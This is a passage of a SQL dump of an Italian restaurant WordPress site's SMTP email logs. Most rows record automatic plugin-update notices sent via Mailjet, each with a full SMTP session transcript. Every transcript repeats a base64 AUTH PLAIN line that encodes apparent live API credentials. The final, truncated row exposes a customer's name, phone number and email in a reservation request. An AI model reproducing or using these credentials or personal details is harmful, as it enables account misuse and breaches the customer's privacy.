webmaster@baldisserri.com\r\nMessage-Id: <9990c70aedae3c6aeec1af43752fe224@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Tue, 06 Apr 2021 12:48:19 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Popup Builder (da versione 3=\r\n..79 a 3.81)=0A- Yoast SEO (da versione 16.0.2 a 16.1)=0A=0A=0ASe hai pro=\r\nblemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di=\r\n supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutar=\r\nti.=0Ahttps://it.wordpress.org/support/forums/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as b5f98dac-fb06-4257-abf1-5438d1d7829d\r\n'),(58917,4654,'solution','All good, mail sent.'),(58918,4654,'success','1'),(58919,4654,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58920,4654,'to_header','webmaster@baldisserri.com'),(58921,4654,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58922,4654,'original_to','webmaster@baldisserri.com'),(58923,4654,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58924,4654,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Cookie and Consent Solution for the GDPR &amp; ePrivacy (da versione 2.4.2 a 2.4.3)\n- Yoast SEO (da versione 16.1 a 16.1.1)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58925,4654,'original_headers',''),(58926,4654,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <05d89263aafe35d987efd0435e0ab87c@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Wed, 07 Apr 2021 00:34:46 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Cookie and Consent Solution=\r\n for the GDPR &amp; ePrivacy (da versione 2.4.2 a 2.4.3)=0A- Yoast SEO (=\r\nda versione 16.1 a 16.1.1)=0A=0A=0ASe hai problemi di qualsiasi tipo o h=\r\nai bisogno di aiuto, i volontari dei forum di supporto su https://it.wor=\r\ndpress.org/forums/ possono riuscire ad aiutarti.=0Ahttps://it.wordpress.=\r\norg/support/forums/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as a6d6d9e0-c84f-431d-a7ff-324608f41821\r\n'),(58927,4655,'solution','All good, mail sent.'),(58928,4655,'success','1'),(58929,4655,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58930,4655,'to_header','webmaster@baldisserri.com'),(58931,4655,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58932,4655,'original_to','webmaster@baldisserri.com'),(58933,4655,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58934,4655,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Popup Builder (da versione 3.81 a 3.82)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58935,4655,'original_headers',''),(58936,4655,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <793cef07e7a2280753a562f6d2d23dc7@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Thu, 08 Apr 2021 14:28:44 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Popup Builder (da versione 3=\r\n..81 a 3.82)=0A=0A=0ASe hai problemi di qualsiasi tipo o hai bisogno di a=\r\niuto, i volontari dei forum di supporto su https://it.wordpress.org/foru=\r\nms/ possono riuscire ad aiutarti.=0Ahttps://it.wordpress.org/support/for=\r\nums/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as dc6fe596-bb09-4658-9f3d-8fe401d562ec\r\n'),(58937,4656,'solution','All good, mail sent.'),(58938,4656,'success','1'),(58939,4656,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58940,4656,'to_header','webmaster@baldisserri.com'),(58941,4656,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58942,4656,'original_to','webmaster@baldisserri.com'),(58943,4656,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58944,4656,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Cookie and Consent Solution for the GDPR &amp; ePrivacy (da versione 2.4.3 a 2.5.0)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58945,4656,'original_headers',''),(58946,4656,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <4989364266aa12c84c9e9a1d7e9be8e1@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Mon, 12 Apr 2021 14:31:39 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Cookie and Consent Solution=\r\n for the GDPR &amp; ePrivacy (da versione 2.4.3 a 2.5.0)=0A=0A=0ASe hai=\r\n problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei foru=\r\nm di supporto su https://it.wordpress.org/forums/ possono riuscire ad ai=\r\nutarti.=0Ahttps://it.wordpress.org/support/forums/=0A=0AIl team di WordP=\r\nress\r\n.\r\n250 OK queued as f470ee67-68bc-469e-b0bb-a204a3148aed\r\n'),(58947,4657,'solution','All good, mail sent.'),(58948,4657,'success','1'),(58949,4657,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58950,4657,'to_header','webmaster@baldisserri.com'),(58951,4657,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58952,4657,'original_to','webmaster@baldisserri.com'),(58953,4657,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58954,4657,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- WP Fastest Cache (da versione 0.9.1.6 a 0.9.1.7)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58955,4657,'original_headers',''),(58956,4657,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <89c632bdcbbd0e4df0027dc19529d9c5@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Thu, 15 Apr 2021 16:41:21 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- WP Fastest Cache (da version=\r\ne 0.9.1.6 a 0.9.1.7)=0A=0A=0ASe hai problemi di qualsiasi tipo o hai bis=\r\nogno di aiuto, i volontari dei forum di supporto su https://it.wordpress=\r\n..org/forums/ possono riuscire ad aiutarti.=0Ahttps://it.wordpress.org/su=\r\npport/forums/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as 9e2731df-8cbf-406f-bd65-433154ac7f37\r\n'),(58957,4658,'solution','All good, mail sent.'),(58958,4658,'success','1'),(58959,4658,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58960,4658,'to_header','webmaster@baldisserri.com'),(58961,4658,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58962,4658,'original_to','webmaster@baldisserri.com'),(58963,4658,'original_subject','[Sol Y Mar] Il tuo sito è aggiornato a WordPress 5.6.3'),(58964,4658,'original_message','Ciao! Il tuo sito su https://www.ristorantesolymar.it/vecchio è stato aggiornato automaticamente a WordPress 5.6.3.\n\nPer altre informazioni sulla versione 5.6.3 vedi la schermata Informazioni su WordPress:\nhttps://www.ristorantesolymar.it/vecchio/wp-admin/about.php\n\n&Egrave; ora disponibile WordPress 5.7.1 L\'aggiornamento è semplice e richiede poco tempo:\nhttps://www.ristorantesolymar.it/vecchio/wp-admin/update-core.php\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nMantenere il tuo sito aggiornato è importante per la sicurezza. Rende inoltre Internet un posto più sicuro per te e i tuoi lettori.\n\nIl team di WordPress\n'),(58965,4658,'original_headers',''),(58966,4658,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <c26faecaa1d125adffd640c4df0c4bfd@ristorantesolymar.it>\r\nSubject: =?UTF-8?Q?[Sol=20Y=20Mar]=20Il=20tuo=20sito=20=C3=A8=20aggiornato=20?=\r\n =?UTF-8?Q?a=20WordPress=205.6.3?=\r\nDate: Fri, 16 Apr 2021 02:34:19 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Il tuo sito su https://www.ristorantesolymar.it/vecchio =C3=A8 sta=\r\nto aggiornato automaticamente a WordPress 5.6.3.=0A=0APer altre informaz=\r\nioni sulla versione 5.6.3 vedi la schermata Informazioni su WordPress:=\r\n=0Ahttps://www.ristorantesolymar.it/vecchio/wp-admin/about.php=0A=0A&Egr=\r\nave; ora disponibile WordPress 5.7.1 L\'aggiornamento =C3=A8 semplice e r=\r\nichiede poco tempo:=0Ahttps://www.ristorantesolymar.it/vecchio/wp-admin/=\r\nupdate-core.php=0A=0ASe hai problemi di qualsiasi tipo o hai bisogno di=\r\n aiuto, i volontari dei forum di supporto su https://it.wordpress.org/fo=\r\nrums/ possono riuscire ad aiutarti.=0Ahttps://it.wordpress.org/support/f=\r\norums/=0A=0AMantenere il tuo sito aggiornato =C3=A8 importante per la si=\r\ncurezza. Rende inoltre Internet un posto pi=C3=B9 sicuro per te e i tuoi=\r\n lettori.=0A=0AIl team di WordPress=0A\r\n.\r\n250 OK queued as 0b5f7660-ce4e-4b6c-a37a-f641f02a95ea\r\n'),(58967,4659,'solution','All good, mail sent.'),(58968,4659,'success','1'),(58969,4659,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58970,4659,'to_header','webmaster@baldisserri.com'),(58971,4659,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58972,4659,'original_to','webmaster@baldisserri.com'),(58973,4659,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58974,4659,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Popup Builder (da versione 3.82 a 3.83)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58975,4659,'original_headers',''),(58976,4659,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <9313b76f421d7905beb977fada058f31@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Fri, 16 Apr 2021 12:36:39 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Popup Builder (da versione 3=\r\n..82 a 3.83)=0A=0A=0ASe hai problemi di qualsiasi tipo o hai bisogno di a=\r\niuto, i volontari dei forum di supporto su https://it.wordpress.org/foru=\r\nms/ possono riuscire ad aiutarti.=0Ahttps://it.wordpress.org/support/for=\r\nums/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as 48640db6-be3e-4f40-8834-022fa196b500\r\n'),(58977,4660,'solution','All good, mail sent.'),(58978,4660,'success','1'),(58979,4660,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58980,4660,'to_header','webmaster@baldisserri.com'),(58981,4660,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58982,4660,'original_to','webmaster@baldisserri.com'),(58983,4660,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58984,4660,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Really Simple SSL (da versione 4.0.13 a 4.0.14)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58985,4660,'original_headers',''),(58986,4660,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <2c078bd4f1703ece86d2a31f7013d897@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Tue, 20 Apr 2021 01:17:03 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Really Simple SSL (da versio=\r\nne 4.0.13 a 4.0.14)=0A=0A=0ASe hai problemi di qualsiasi tipo o hai biso=\r\ngno di aiuto, i volontari dei forum di supporto su https://it.wordpress.=\r\norg/forums/ possono riuscire ad aiutarti.=0Ahttps://it.wordpress.org/sup=\r\nport/forums/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as c7ebfc13-7a8a-4e34-9a45-c67d2b1ceb52\r\n'),(21105,1025,'success','1'),(21106,1025,'from_header','Paolo Barchi <notifiche@ristorantesolymar.it>'),(21107,1025,'to_header','teosphone@gmail.com'),(21108,1025,'reply_to_header','barchi@libero.it'),(21109,1025,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21110,1025,'original_to','teosphone@gmail.com'),(21111,1025,'original_subject','Da sito Sol Y Mar: \"Richiesta prenotazione\"'),(21112,1025,'original_message','Da: Paolo Barchi <barchi@libero.it>\nTelefono: 3356113164\nOggetto: Richiesta prenotazione\n\nCorpo del messaggio:\nBuonasera, son un vostro affezionato e ultraventennale Cliente!\r\nMi farebbe molto piacere cenare presso di voi sabato sera, insieme a mia Moglie e mia Figlia.\r\nE’ possibile riservare un tavolo?\r\nVi ringrazio per la 